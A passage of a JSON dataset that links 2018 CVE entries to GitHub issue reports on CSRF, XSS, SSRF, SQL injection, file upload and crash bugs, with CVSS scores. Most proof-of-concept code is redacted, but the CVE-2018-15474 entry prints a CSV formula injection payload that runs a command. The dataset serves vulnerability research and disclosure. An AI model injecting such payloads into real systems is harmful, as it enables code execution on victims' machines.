\u5b98\u65b9\u4e3e\u4f8b\uff1a URLTAG Official examples: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-15137",
        "Issue_Url_old": "https://github.com/safakaslan/CelaLinkCLRM20/issues/1",
        "Issue_Url_new": "https://github.com/safakaslan/celalinkclrm20/issues/1",
        "Repo_new": "safakaslan/CelaLinkCLRM20",
        "Issue_Created_At": "2018-08-01T14:25:17Z",
        "description": "Arbitrary File Upload Cela Link CLR M NUMBERTAG Exploit Title: Arbitrary File Upload Cela Link CLR M NUMBERTAG Date NUMBERTAG Shodan Dork: CLR M NUMBERTAG Exploit Author: Safak Aslan Software Link: FILETAG Version NUMBERTAG Authentication Required: No Tested on: Windows Vulnerability Description Due to the Via APITAG APITAG Distributed Authoring and Versioning), on the remote server, Cela Link CLR M NUMBERTAG allows unauthorized users to upload any file (e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes remote code execution as well. Due to the APITAG it is possible to upload the arbitrary file utilizing the PUT method. Proof of Concept Request PUT FILETAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en,tr TR; APITAG US;q NUMBERTAG Accept Encoding: gzip, deflate Content Length NUMBERTAG the reflection of random numbers NUMBERTAG Response HTTP NUMBERTAG Created Content Length NUMBERTAG Date: Fri NUMBERTAG Jul NUMBERTAG GMT Server: APITAG As a result, on the FILETAG , \"the reflection of random numbers NUMBERTAG is reflected on the page.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15157",
        "Issue_Url_old": "https://github.com/libyal/libfsclfs/issues/3",
        "Issue_Url_new": "https://github.com/libyal/libfsclfs/issues/3",
        "Repo_new": "libyal/libfsclfs",
        "Issue_Created_At": "2018-08-08T06:44:43Z",
        "description": "APITAG OOB read Access Violation. the libfsclfs_block_read function in APITAG in libfsclfs allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted clfs file. ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15158",
        "Issue_Url_old": "https://github.com/libyal/libesedb/issues/43",
        "Issue_Url_new": "https://github.com/libyal/libesedb/issues/43",
        "Repo_new": "libyal/libesedb",
        "Issue_Created_At": "2018-08-08T06:56:15Z",
        "description": "Multiple bugs NUMBERTAG the libesedb_page_read_values function in libesedb_page.c in libesedb allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted esedb file. ERRORTAG NUMBERTAG the libesedb_page_read_tags function in libesedb_page.c in libesedb allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted esedb file. ERRORTAG NUMBERTAG the APITAG function in libesedb_catalog_definition.c in libesedb allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted esedb file. ERRORTAG NUMBERTAG the libesedb_key_append_data function in libesedb_key.c in libesedb allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted esedb file. ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15168",
        "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/2",
        "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/2",
        "Repo_new": "x-f1v3/forcve",
        "Issue_Created_At": "2018-07-30T11:24:32Z",
        "description": "Zoho manageengine Applications Manager SQL Injection vulnerability. Zoho manageengine Applications Manager SQL Injection vulnerability Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Exploit Author's Email: jacky. EMAILTAG .cn I found a sql injection in the Zoho APITAG Applications Manager NUMBERTAG build) via the resids parameter in APITAG GET request. Proof of Concept: CODETAG This is a time based blind SQL Injection vulnerability .So I use sqlmap to exploit it APITAG following is a proof screenshot. FILETAG To get the admin'spassword: FILETAG The vendor has fixed the vulnerability\uff1a FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15169",
        "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/3",
        "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/3",
        "Repo_new": "x-f1v3/forcve",
        "Issue_Created_At": "2018-07-31T11:28:15Z",
        "description": "Zoho manageengine Applications Manager NUMBERTAG build) Reflected XSS. Zoho manageengine Applications Manager NUMBERTAG build) Reflected XSS Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Exploit Author's Email: jacky. EMAILTAG .cn I found a Reflected XSS in the Zoho APITAG Applications Manager NUMBERTAG build) via the method parameter in APITAG request. Proof of Concept APITAG Local test: FILETAG Demo site test: FILETAG Notice: This vul can reproduce without login. The vendor has fixed the vulnerability\uff1a FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15192",
        "Issue_Url_old": "https://github.com/gogs/gogs/issues/5366",
        "Issue_Url_new": "https://github.com/gogs/gogs/issues/5366",
        "Repo_new": "gogs/gogs",
        "Issue_Created_At": "2018-08-06T10:24:52Z",
        "description": "server side request forgery (SSRF) vulnerability in webhooks. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG FILETAG you could see that i get the http response of caddy running in APITAG of APITAG , which is only opened to local user also , i could know which port is opened like mysql in port NUMBERTAG even it just opened to a local user Patch check the url that users may input , webhooks shouldn't allow such internal address access Discoverer Wenxu Wu of Tencent's Xuanwu Lab",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15192",
        "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4624",
        "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4624",
        "Repo_new": "go-gitea/gitea",
        "Issue_Created_At": "2018-08-06T13:17:25Z",
        "description": "server side request forgery (SSRF) vulnerability in webhooks. Gitea version (or commit ref NUMBERTAG rc NUMBERTAG g9ea NUMBERTAG f1f Git version: not relevant Operating system: not relevant Database (use APITAG ): [ ] APITAG [x] APITAG [ ] MSSQL [ ] APITAG Can you reproduce the bug at FILETAG [x] Yes (provide example URL) [ ] No [ ] Not relevant Log gist: Description Due to shared code base, gitea is affected by issue URLTAG (server side request forgery (SSRF) vulnerability in webhooks). To reproduce: create Webhook with target URL to any running existing service exposed only to localhost (for example localhost NUMBERTAG or localhost NUMBERTAG depending on what is running on the test machine). POST content Screenshots See URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15193",
        "Issue_Url_old": "https://github.com/gogs/gogs/issues/5367",
        "Issue_Url_new": "https://github.com/gogs/gogs/issues/5367",
        "Repo_new": "gogs/gogs",
        "Issue_Created_At": "2018-08-06T12:50:42Z",
        "description": "Cross Site Request Forgery (CSRF) in admin panel. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG FILETAG attacker can embed an image tag in issues , when administrator visit the issue , the operation is fired. see the online demo (attention , if administrator visit it , your ssh key is wipped out) URLTAG Patch change the call method of these operations from GET to POST or enable csrf token for get method. Discoverer Wenxu Wu of Tencent's Xuanwu Lab",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15197",
        "Issue_Url_old": "https://github.com/liu21st/onethink/issues/36",
        "Issue_Url_new": "https://github.com/liu21st/onethink/issues/36",
        "Repo_new": "liu21st/onethink",
        "Issue_Created_At": "2018-08-06T13:43:30Z",
        "description": "There are two CSRF vulnerabilities that can add the administrator account. After the Administrator logged in,open the following two page poc: APITAG add a user CODETAG APITAG Endowing user administrator privileges CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15199",
        "Issue_Url_old": "https://github.com/auracms/AuraCMS/issues/1",
        "Issue_Url_new": "https://github.com/auracms/auracms/issues/1",
        "Repo_new": "auracms/auracms",
        "Issue_Created_At": "2018-08-06T12:11:02Z",
        "description": "Stored XSS in bukutamu page. Description: A cross site scripting (XSS) vulnerability in APITAG may allow remote attackers (users) to inject arbitrary Web scripts through the source editor, which will cause an attacker (user) to get the administrator's cookie and log in to the administrator interface. Vulnerability Type: Stored XSS Attack Vectors: APITAG APITAG as a user FILETAG APITAG on Bukutamu > APITAG FILETAG APITAG XSS Payload : APITAG APITAG FILETAG NUMBERTAG Go to Bukutamu NUMBERTAG SS! FILETAG Attack Impact: This can be used to perform operations on an administrator (or any user leaving a message on the site) and can lead to hijacking an administrator's cookie.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-15202",
        "Issue_Url_old": "https://github.com/Juunan06/eCommerce/issues/1",
        "Issue_Url_new": "https://github.com/juunan06/ecommerce/issues/1",
        "Repo_new": "juunan06/ecommerce",
        "Issue_Created_At": "2018-08-06T07:46:27Z",
        "description": "There is a CSRF vulnerability that can add new users, and add site projects to fake identity. There is a CSRF vulnerability that can add new users, and add site projects to fake identity APITAG user POC\uff1a CODETAG APITAG item POC\uff1a ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 6.3,
        "impactScore": 3.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15203",
        "Issue_Url_old": "https://github.com/ignitedcms/ignitedcms/issues/4",
        "Issue_Url_new": "https://github.com/ignitedcms/ignitedcms/issues/4",
        "Repo_new": "ignitedcms/ignitedcms",
        "Issue_Created_At": "2018-08-06T13:09:04Z",
        "description": "There are two CSRF vulnerabilities that can create new pages or update the website settings. APITAG is a CSRF vulnerability that can create new pages poc: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15474",
        "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2450",
        "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2450",
        "Repo_new": "dokuwiki/dokuwiki",
        "Issue_Created_At": "2018-07-19T18:07:14Z",
        "description": "CSV Formula Injection vulnerability. The following was reported directly to me by Jean Benjamin Rousseau from SEC Consult APITAG AG Vulnerability overview/description: The administration panel of the application has a \"CSV export of users\" feature which allows the export of user data (username, real name, email address and user groups) as a CSV file. On the registration page, it is possible for an attacker to set certain values in the Real Name field that when exported and opened with a spreadsheet application APITAG Excel, Open Office, etc.) will be interpreted as a formula. This puts the administrators who open those malicious exported files at risk. Exfiltration of sensitive data or even the execution of arbitrary code on the local machine of the victim will be the result. The final impact depends on the used spreadsheet software on the client of the victim. Proof of concept: Registration URL: URLTAG When the registration request is submitted, the following parameters are sent in a POST request: APITAG ` The \"fullname\" parameter is not sanitized before being stored and during the CSV export. An attacker can inject different CSV formula payloads in the fullname parameter. For example: =cmd|'/C calc'!A0 As soon as the file gets opened in Microsoft Excel, the program FILETAG is launched. Different warnings might pop up. However, these warnings are usually ignored because the file comes from a trusted source.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15503",
        "Issue_Url_old": "https://github.com/swoole/swoole-src/issues/1882",
        "Issue_Url_new": "https://github.com/swoole/swoole-src/issues/1882",
        "Repo_new": "swoole/swoole-src",
        "Issue_Created_At": "2018-08-14T05:30:41Z",
        "description": "SIGSEGV in Swoole APITAG function. Description: Swoole unpack function produces a sigsegv when it calls i_zval_ptr_dtor: Tested on: PHP NUMBERTAG cli) (built: Aug NUMBERTAG NTS ) Swoole: swoole NUMBERTAG Backtrace NUMBERTAG bc NUMBERTAG in i_zval_ptr_dtor (zval_ptr NUMBERTAG ffff NUMBERTAG b NUMBERTAG at PATHTAG NUMBERTAG zend_array_destroy (ht NUMBERTAG ffff NUMBERTAG f3f0) at PATHTAG NUMBERTAG b NUMBERTAG a7 in _zval_dtor_func (p NUMBERTAG ffff NUMBERTAG f3f0) at PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG in _zval_ptr_dtor_nogc (zval_ptr NUMBERTAG fffffff NUMBERTAG at PATHTAG NUMBERTAG swoole_unserialize_object (buffer NUMBERTAG return_value NUMBERTAG ffff NUMBERTAG c0, bucket_len NUMBERTAG args NUMBERTAG flag NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG aeecd in swoole_unserialize_arr (buffer NUMBERTAG ffff NUMBERTAG f NUMBERTAG b, zvalue NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG flag NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG b6e NUMBERTAG in php_swoole_unserialize (buffer NUMBERTAG ffff NUMBERTAG f NUMBERTAG a, len NUMBERTAG return_value NUMBERTAG ffff NUMBERTAG c NUMBERTAG object_args NUMBERTAG flag NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG f7 in zim_swoole_serialize_unpack (execute_data NUMBERTAG ffff NUMBERTAG c NUMBERTAG return_value NUMBERTAG ffff NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG d NUMBERTAG b3 in APITAG () at PATHTAG NUMBERTAG execute_ex (e NUMBERTAG ffff NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG d4c NUMBERTAG in zend_execute (op_array NUMBERTAG ffff NUMBERTAG c2a0, return_value NUMBERTAG at PATHTAG NUMBERTAG b9cdfb in zend_execute_scripts (type NUMBERTAG retval NUMBERTAG file_count NUMBERTAG at PATHTAG NUMBERTAG aeba NUMBERTAG in php_execute_script (primary_file NUMBERTAG fffffffe0c0) at PATHTAG NUMBERTAG d4f NUMBERTAG d in do_cli (argc NUMBERTAG arg NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG d NUMBERTAG d0 in main (argc NUMBERTAG arg NUMBERTAG f NUMBERTAG at PATHTAG ERRORTAG NUMBERTAG ffff NUMBERTAG e1 in __libc_start_main (main NUMBERTAG d NUMBERTAG d APITAG , argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG d3a in _start () Registers: ra NUMBERTAG rb NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG ffff NUMBERTAG b NUMBERTAG rdi NUMBERTAG ffff NUMBERTAG f3f NUMBERTAG rbp NUMBERTAG fffffff NUMBERTAG fffffff NUMBERTAG rsp NUMBERTAG fffffff NUMBERTAG fffffff NUMBERTAG r NUMBERTAG ffff NUMBERTAG r NUMBERTAG fffffff7aac NUMBERTAG r NUMBERTAG r NUMBERTAG bbc NUMBERTAG r NUMBERTAG d NUMBERTAG r NUMBERTAG fffffffe NUMBERTAG r NUMBERTAG ffff NUMBERTAG c NUMBERTAG r NUMBERTAG ffff NUMBERTAG f NUMBERTAG rip NUMBERTAG bc NUMBERTAG bc NUMBERTAG APITAG eflags NUMBERTAG IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG APITAG info NUMBERTAG bc NUMBERTAG APITAG mov eax, dword ptr [ra NUMBERTAG bc NUMBERTAG APITAG lea edx, [ra NUMBERTAG bc NUMBERTAG APITAG mov rax, qword ptr [rbp NUMBERTAG bc NUMBERTAG APITAG mov dword ptr [rax], ed NUMBERTAG bc NUMBERTAG b APITAG mov rax, qword ptr [rbp NUMBERTAG bc NUMBERTAG f APITAG mov eax, dword ptr [ra NUMBERTAG bc NUMBERTAG APITAG test eax, ea NUMBERTAG bc NUMBERTAG APITAG jne zend_array_destroy NUMBERTAG APITAG NUMBERTAG bc NUMBERTAG APITAG mov rax, qword ptr [rbp NUMBERTAG bc NUMBERTAG APITAG mov qword ptr [rbp NUMBERTAG ra NUMBERTAG bc NUMBERTAG b APITAG mov rax, qword ptr [rbp NUMBERTAG static zend_always_inline void i_zval_ptr_dtor(zval zval_ptr ZEND_FILE_LINE_DC NUMBERTAG if (Z_REFCOUNTED_P(zval_ptr NUMBERTAG zend_refcounted ref = Z_COUNTED_P(zval_ptr NUMBERTAG if (! GC_REFCOUNT(ref NUMBERTAG zval_dtor_func(ref ZEND_FILE_LINE_RELAY_CC NUMBERTAG else NUMBERTAG gc_check_possible_root(ref NUMBERTAG I am not sure, but I believe that with this issue a APITAG on an arbitrary address(using _val_dtor_func) can be done, so maybe this can be a vulnerability (but as I said, I am not sure). Test script: APITAG unpack($sor); echo \"[+] Swoole Unserialized: \"; var_dump($ser); //var_dump($obj >unpack($test)); APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15504",
        "Issue_Url_old": "https://github.com/embedthis/goahead/issues/264",
        "Issue_Url_new": "https://github.com/embedthis/goahead/issues/264",
        "Repo_new": "embedthis/goahead",
        "Issue_Created_At": "2018-02-06T02:09:15Z",
        "description": "NULL dereference for invalid Host and If Modified headers. Overview A security vulnerability affecting APITAG versions NUMBERTAG up to and including NUMBERTAG with specially crafted if modified or host headers has been identified. This bulletin discusses this flaw and its implications. Summary A HTTP POST request with specially crafted, invalid if modified and/or Host header fields may cause a NULL dereferences and thus cause a denial of service. Description If the \"host\" field of a http request does not contain a closing IP NUMBERTAG character a NULL dereference will occur. If the \"if modified since\" or \"if unmodified since\" headers contain an invalid time such that the month decodes to be greater than NUMBERTAG a NULL dereference will occur. Threat Scope Versions up to and including NUMBERTAG Fixed in NUMBERTAG Severity Medium. An attacker could cause a denial of service. Remedy Apply the quick patch below to APITAG NUMBERTAG to NUMBERTAG Alternatively, upgrade to APITAG NUMBERTAG Quick Patch In socket.c: CODETAG In time.c: CODETAG Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15504",
        "Issue_Url_old": "https://github.com/embedthis/appweb/issues/605",
        "Issue_Url_new": "https://github.com/embedthis/appweb/issues/605",
        "Repo_new": "embedthis/appweb",
        "Issue_Created_At": "2018-02-06T02:00:26Z",
        "description": "NULL dereference for invalid Host and If Modified headers. Overview A security vulnerability affecting Appweb versions up to and including NUMBERTAG with specially crafted if modified or host headers has been identified. This bulletin discusses this flaw and its implications. Summary A HTTP POST request with specially crafted, invalid if modified and/or Host header fields may cause a NULL dereferences and thus cause a denial of service. Description If the \"host\" field of a http request does not contain a closing IP NUMBERTAG character a NULL dereference will occur. If the \"if modified since\" or \"if unmodified since\" headers contain an invalid time such that the month decodes to be greater than NUMBERTAG a NULL dereference will occur. Threat Scope Versions up to and including NUMBERTAG Fixed in NUMBERTAG Severity Medium. An attacker could cause a denial of service. Remedy Apply the quick patch below to Appweb NUMBERTAG to NUMBERTAG Alternatively, upgrade to Appweb NUMBERTAG when it is released. APITAG NUMBERTAG is highly compatible with Appweb NUMBERTAG and upgrading should be straightforward. Quick Patch CODETAG Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15560",
        "Issue_Url_old": "https://github.com/Legrandin/pycryptodome/issues/198",
        "Issue_Url_new": "https://github.com/legrandin/pycryptodome/issues/198",
        "Repo_new": "legrandin/pycryptodome",
        "Issue_Created_At": "2018-08-17T15:03:22Z",
        "description": "Integer overflow vulnerability in pycryptodome module. APITAG pycryptodome module in python APITAG the following poc python poc.py APITAG NUMBERTAG python will APITAG fault) APITAG vulnerability analysis reference: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15564",
        "Issue_Url_old": "https://github.com/daveismyname/simple-cms/issues/4",
        "Issue_Url_new": "https://github.com/dcblogdev/simple-cms/issues/4",
        "Repo_new": "dcblogdev/simple-cms",
        "Issue_Created_At": "2018-08-08T04:05:46Z",
        "description": "simple cms has Cross site request forgery. URLTAG I can delete any page when I send the url to administrator. I can also use the Short APITAG to encode the url. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15565",
        "Issue_Url_old": "https://github.com/daveismyname/simple-cms/issues/3",
        "Issue_Url_new": "https://github.com/dcblogdev/simple-cms/issues/3",
        "Repo_new": "dcblogdev/simple-cms",
        "Issue_Created_At": "2018-08-08T03:57:57Z",
        "description": "simple cms has Cross site request forgery. URLTAG I can add page when admin click the html file. payload: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15565",
        "Issue_Url_old": "https://github.com/daveismyname/simple-cms/issues/2",
        "Issue_Url_new": "https://github.com/dcblogdev/simple-cms/issues/2",
        "Repo_new": "dcblogdev/simple-cms",
        "Issue_Created_At": "2018-08-08T03:50:41Z",
        "description": "simple cms has Unauthorized Access. FILETAG This url is used to log in admin. But I can access FILETAG without logging admin. And I can also add page. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15566",
        "Issue_Url_old": "https://github.com/fmsdwifull/tp5cms/issues/2",
        "Issue_Url_new": "https://github.com/fmsdwifull/tp5cms/issues/2",
        "Repo_new": "fmsdwifull/tp5cms",
        "Issue_Created_At": "2018-08-10T07:19:56Z",
        "description": "tp5cms NUMBERTAG has XSS vulnerability in input FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15568",
        "Issue_Url_old": "https://github.com/fmsdwifull/tp5cms/issues/3",
        "Issue_Url_new": "https://github.com/fmsdwifull/tp5cms/issues/3",
        "Repo_new": "fmsdwifull/tp5cms",
        "Issue_Created_At": "2018-08-10T10:05:11Z",
        "description": "tp5cms NUMBERTAG has Cross site request forgery. I can delete category via catid when admin click the csrf html file. CSRF HTML: CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15570",
        "Issue_Url_old": "https://github.com/caokang/waimai/issues/4",
        "Issue_Url_new": "https://github.com/caokang/waimai/issues/4",
        "Repo_new": "caokang/waimai",
        "Issue_Created_At": "2018-08-07T01:50:56Z",
        "description": "thre is a store xss at the information of goods. after logged as admin ,thre is a store xss at the information of goods the attacked url: URLTAG the fcname is attacked post NUMBERTAG Content Disposition: form data; name=\"fcname\" \u00e7\u00be\u008e\u00e5\u0091\u00b3\u00e6\u00b1\u0089\u00e5\u00a0 APITAG APITAG NUMBERTAG Content Disposition: form data; name=\"fcid NUMBERTAG Content Disposition: form data; name=\"fcsort NUMBERTAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-15603",
        "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/2",
        "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/2",
        "Repo_new": "victoralagwu/cmssite",
        "Issue_Created_At": "2018-08-20T07:50:29Z",
        "description": "There have Storage type XSS vulnerability that can excute javascript. Here is a XSS vulnerability. No login required. Just need to open an article and comment on it. For example\uff0cthis article\uff1a FILETAG Add comments here > FILETAG When I click Submit\uff0cit will pop up XSS > FILETAG Here is the page source code > FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15607",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1255",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1255",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-08-21T06:29:23Z",
        "description": "APITAG NUMBERTAG A hang in convert. Prerequisites [\u221a ] I have written a descriptive issue title [ \u221a] I have verified that I am using the latest version of APITAG [ \u221a] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG I use the fuzz tool test the newest version of APITAG I found a crash that will cause the program hang(more than ten minutes),and the CPU and memory will be APITAG that the poc only have NUMBERTAG bytes. Steps to Reproduce APITAG Inter(R) Core(TM) i NUMBERTAG CPU NUMBERTAG GHz NUMBERTAG G RAM NUMBERTAG G Disk APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Linu NUMBERTAG generic APITAG Ubuntu SMP Thu Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: looking forward to hearing from you soon:) APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15747",
        "Issue_Url_old": "https://github.com/prasmussen/glot-code-runner/issues/15",
        "Issue_Url_new": "https://github.com/prasmussen/glot-code-runner/issues/15",
        "Repo_new": "prasmussen/glot-code-runner",
        "Issue_Created_At": "2018-08-23T09:11:20Z",
        "description": "Arbitrarily code execute. This program doesn't limit the execution of command, we can run arbitrarily command on this runner. payload: CODETAG output: ERRORTAG If this program run on a website, it will cause remote command execution. For example FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15834",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/11274",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/11274",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-08-27T11:44:47Z",
